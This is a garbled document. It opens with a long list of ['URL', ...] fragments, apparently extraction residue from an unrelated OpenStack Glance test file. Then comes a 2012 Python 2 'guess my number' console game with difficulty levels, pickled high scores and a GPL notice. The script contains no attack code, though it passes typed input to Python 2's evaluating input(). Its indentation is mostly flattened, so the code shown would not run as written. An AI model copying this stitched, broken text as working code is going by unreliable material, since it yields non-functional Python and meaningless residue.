['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'record.ke'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.bo'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'headers.it'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.ke'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'hashlib.md'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 
'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], 
['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.body.fi'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'header.it'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], 
['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'base.Is'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'images.Im'], ['URL', 'self.FI'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'response.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'response.re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'self.as'], ['URL', 'response.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'image.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 
'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'base.Is'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'models.re'], ['URL', 'self.de'], ['URL', 'models.re'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'image.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'output.st'], 
['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st']] |
24 | #!/usr/bin/python
# version 4
# april 2012
# this was written by saikia81 and is copyrighted under the GNU general public license 3
# it was written in notepad++, a program I recommend!
# whitespace ftw!
#import random, system and operating system possibilities.
import os, sys
import random, time #time module
#pickling for data2file
import cPickle as pickle
#introducing the player
def instructions():
print 'welcome to the guess my number game V4'
print "I'll think of a number and you have to guess it\n"
#making a list of all possible numbers for every dificulty
def list_numbers():
list_easy = []
list_medium = []
list_hard = []
for n in range(1,101):
list_easy.append(n)
list_medium.append(n)
list_hard.append(n)
for n in range(101,201):
list_medium.append(n)
list_hard.append(n)
for n in range(-201,0):
n += 1
list_hard.append(n)
return list_easy, list_medium, list_hard
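# For reference (editor's note): as sets, the lists built above equal
#   list_easy   -> range(1, 101)     # 1..100
#   list_medium -> range(1, 201)     # 1..200
#   list_hard   -> range(-200, 201)  # -200..200, zero included
# (list_hard is appended out of order: 1..200 first, then -200..0.)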
#does the player want to change the dificulty
def change_dificulty(dificulty):
    if dificulty is None:
dificulty = choose_dificulty()
return dificulty
if raw_input("do you want to change dificulty? yes/no: ") == 'yes':
dificulty = choose_dificulty()
return dificulty
else:
return dificulty
#the dificulty the player wants to choose
def choose_dificulty():
print '\nwhat dificulty do you want to play in?'
dificulty = raw_input('choose between "easy", "medium" or "hard":\n')
dificulties = 'easy', 'medium', 'hard'
#if anybody tries to be smart: help them get it right
wrong = -1
if dificulty in dificulties: wrong = 0
elif dificulty not in dificulties:
wrong += 1
for n in (1,2,3):
if n == 3:
print "\nseems like you can't handle choosing a dificulty..."
dificulty = "easy"
time.sleep(2)
print ""
elif (dificulty not in dificulties):
print 'something went wrong!!! please try again\n'
dificulty = raw_input('choose between "easy", "medium" or "hard":\n')
wrong += 1
elif dificulty in dificulties:
print "\nalright so let's get started :D\n"
break
else:
print "you're doing something wrong! I'll chooce a dificulty for you\a\a\a\a\n"
dificulty = 'easy'
print "ERROR: 008"
time.sleep(2)
else:
print '\a\a\asomething went wrong the program will shutdown.'
print "ERROR: 009"
time.sleep(2.5)
sys.exit()
return dificulty
#so here a random number will be choosen depending of the dificulty
def random_number(dificulty, list_easy, list_medium, list_hard):
if dificulty == 'easy':
NUMBER = random.randrange(100) + 1
print "you have choosen the dificulty easy."
number_range = '1 and 100: '
numbers = list_easy
elif dificulty == 'medium':
NUMBER = random.randrange(200) + 1
print "you have choosen the dificulty medium."
number_range = '1 and 200: '
numbers = list_medium
elif dificulty =='hard':
NUMBER = random.randrange(-200,201)
print "you have choosen the dificulty hard."
number_range = '-200 and 200: '
numbers = list_hard
else:
print "dificulty malfunction"
print "ERROR: 003"
time.sleep(2.5)
exit()
return NUMBER, number_range, numbers
# if the guess != "the (predefined) number": loop.
def game(dificulty, NUMBER, number_range, numbers):
time.sleep(2.5)
os.system('cls')
guesses=0
guess='nothing'
while guess != NUMBER:
if guess == 'nothing':
print 'guess a number between', number_range
try:
guess = input()
except:
print "\nsomething went wrong\nyou're getting another try\n\n"
continue
guesses += 1
elif guess == 'cheater':
guess = NUMBER
elif guess not in numbers:
print "\nthe guess you made isn't in the range of valid numbers.\nAre you sure you want to make this guess?"
answ = raw_input("'yes'/'no' \n")
if answ == 'yes':
print "it's your funeral"
                print '\nguess a number between', number_range
guesses += 1
elif answ == 'no':
print "good choice"
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\nyou're getting another try\n"
continue
else:
print "that isn't a valid option"
print "let's continue\n"
#if the number is higher than the guess
elif guess < NUMBER:
print 'higher...'
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\nyou're getting another try\n"
continue
guesses += 1
continue
#if the number is 'lower...'
elif guess > NUMBER:
print 'lower...'
print '\nguess a number between', number_range
try:
guess = input()
except:
print "something went wrong\n you'll get another try"
continue
            guesses += 1
#this is actually an error that will never occur... but better safe than sorry.
else:
print '\a\a\asorry, something went wrong. The game will now end itself.'
sys.exit()
print
    print 'you did it! the NUMBER was:', NUMBER,
    print 'and it cost you', guesses, 'guesses to get it right on dificulty', dificulty
print
return guesses
##Here I will use the 'os' module to keep a highscore system
#in the default appdata of the users profile.
#everything here is to see if everything is alright in it's place.
def highscore(dificulty,guesses):
FOLDER_LOCALAPPDATA = os.environ['LOCALAPPDATA']
FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + '\\Number_game'
#deciding if a new highscore file and/or dir is needed
    if not os.access(FOLDER_NUMBER_GAME, os.F_OK): #dir
try:
os.mkdir(FOLDER_NUMBER_GAME)
except:
os.system('cls')
print 'creating folder: ERROR\nError code: 002'
os.system('pause')
sys.exit()
try:
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "w+")
easy_highscores={}
medium_highscores={}
hard_highscores={}
all_highscores = [easy_highscores,medium_highscores,hard_highscores]
pickle.dump(all_highscores,HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r+")
unpickled_file = pickle.load(HIGHSCORES_DAT)
except:
os.system('cls')
print 'loading file: ERROR\nError code: 001'
os.system('pause')
sys.exit()
else:
HIGHSCORES_DAT.close()
#done with file and folder creation
#
#showing highscores
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r")
try:
unpickled_file = pickle.load(HIGHSCORES_DAT)
except:
print "couldn't locate or unpickle file"
print "ERROR: 005"
print "\n if this was your first run of the game: this is common"
print "if not, please send a message at dummy@email.com, thank you"
time.sleep(1)
print "everything went worse then expected. shutting down"
time.sleep(2.5)
sys.exit()
else:
HIGHSCORES_DAT.close()
if dificulty == "easy": l=0
if dificulty == "medium": l=1
if dificulty == "hard": l=2
highscores = unpickled_file[l]
#creating your highscore...
your_name = raw_input('what is your name?: ')
try:
if highscores[your_name]>guesses:
os.system('cls')
print "congratulations, new highscore!!"
if raw_input('do you want to replace your score yes/no: ') =="yes": highscores[your_name]=guesses
except:
print "new user"
highscores[your_name]=guesses
    list_keys = highscores.keys()
    list_values = highscores.values()
    list_values.sort()
time.sleep(4)
os.system('cls')
#deeply annoying part
#highscore display
print" ---HIGHSCORE---"
print "highscores in", dificulty,"dificulty"
print"\nname attempts"
print"----------------------------------------"
i=0
#for values in sorted values list
for n in list_values:
#reset found to find next highscore
found = False
#set p to 0: to try different keys
p=0
#while the matching key and value not found keep looking
while found != True:
#m = the next key in list
m=list_keys[p]
if highscores[m] == n: found=True
p+=1
b=len(m)
b=21-b
print m,' '*b,highscores[m]
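    # Editor's sketch: the value/key matching loop above can be written in one
    # idiomatic pass (equivalent output, assuming scores are unique enough):
    #   for name, score in sorted(highscores.items(), key=lambda kv: kv[1]):
    #       print name.ljust(22), score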
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "r")
unpickled_file = pickle.load(HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
if l==0: unpickled_file[0]=highscores
if l==1: unpickled_file[1]=highscores
if l==2: unpickled_file[2]=highscores
HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+"\\highscores.dat", "w")
pickle.dump(unpickled_file,HIGHSCORES_DAT)
HIGHSCORES_DAT.close()
def end():
time.sleep(1)
print('''
The number Game V4
Copyright (C) 2012 Saikia81
''')
time.sleep(5)
os.system('cls')
print("""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
""")
time.sleep(7)
try:
if pygame.mixer.get_busy()>0:
try:
pygame.mixer.music.fadeout(3000)
except:
print "ERROR: 012"
except:
pass
time.sleep(3)
os.system('pause')
sys.exit()
def main():
#initializing
ask_music = raw_input('music "on"?: ')
if (ask_music == 'on') or (ask_music == 'yes'):
try:
import pygame.mixer
pygame.mixer.init()
pygame.mixer.music.load("song.mp3")
pygame.mixer.music.play(-1)
except:
print "pygame not working!\nError: 013"
os.system('cls')
list_easy, list_medium, list_hard = list_numbers()
dificulty = None
instructions()
while 1:
dificulty=change_dificulty(dificulty)
NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard)
guesses = game(dificulty, NUMBER, number_range, numbers)
highscore(dificulty,guesses)
ask_again = raw_input('\ndo you want to play again? yes/no: ')
os.system('cls')
if ask_again == 'no': end()
#start
main()
